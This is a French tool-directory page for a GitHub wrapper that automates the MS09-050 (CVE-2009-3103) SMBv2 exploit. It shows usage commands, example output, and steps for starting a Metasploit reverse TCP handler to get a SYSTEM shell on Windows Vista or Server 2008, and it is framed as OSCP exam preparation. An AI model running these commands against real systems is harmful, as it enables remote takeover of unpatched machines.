Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ms09-050-CVE-2009-3103-exploit | Kitploit
Outils/GitHubGitHub/nicolasdamians/ms09-050-cve-2009-3103-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeTests d'IntrusionApprentissage et Éducation
GitHubnicolasdamians/ms09-050-cve-2009-3103-exploit

ms09-050-CVE-2009-3103-exploit

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
il y a 8 moisPas encore vérifié

Wrapper d'exploit SMBv2 MS09-050

Mise en place en une ligne pour l'exploitation de MS09-050 (CVE-2009-3103). Sans prise de tête, sans débogage, ça fonctionne.

Pourquoi ?

La plupart des scripts MS09-050 qui circulent nécessitent une injection manuelle du shellcode, ont des problèmes de timing avec les handlers, ou tout simplement ne fonctionnent pas. Ce wrapper :

  • Génère le shellcode avec les bons paramètres
  • Construit l'exploit automatiquement
  • Crée un handler Metasploit prêt à l'emploi
  • Vous indique exactement quoi exécuter

Conçu pour la préparation à l'OSCP, où le temps compte.

Cible

  • Vulnérabilité : MS09-050 / CVE-2009-3103
  • Systèmes affectés : Windows Vista SP1/SP2, Windows Server 2008 (avant R2)
  • Service : SMBv2 sur le port 445
  • Résultat : shell SYSTEM

Prérequis

  • Kali Linux (ou toute distribution avec Metasploit)
  • msfvenom
  • msfconsole
  • python2
  • rpcclient (généralement préinstallé)

Utilisation

root@kitploit:~
./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]

Exemple

root@kitploit:~
./ms09_050.sh 192.168.233.40 192.168.45.232 443

Sortie :

root@kitploit:~
[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
    - exploit.py
    - handler.rc

=== RUN ===

Terminal 1:  msfconsole -q -r handler.rc
Terminal 2:  python2 exploit.py 192.168.233.40

Exécution

  1. Terminal 1 - Démarrez le handler :

    root@kitploit:~
    msfconsole -q -r handler.rc
    

    Attendez le message : Started reverse TCP handler on ...

  2. Terminal 2 - Lancez l'exploit :

    root@kitploit:~
    python2 exploit.py 192.168.233.40
    
  3. Vérifiez dans le Terminal 1 que vous avez bien votre shell.

Notes

  • Utilise un payload stagé (windows/shell/reverse_tcp) - fonctionne de manière fiable avec le stager de cet exploit
  • Si l'exploit échoue, la cible a peut-être besoin d'un redémarrage ou n'est pas vulnérable
  • Le port 443 est recommandé si 4444 est filtré

Crédits

Exploit original basé sur le PoC MS09-050 d'ohnozzy.

Licence

MIT - Faites ce que vous voulez, ne soyez simplement pas diabolique.

Télécharger l’outil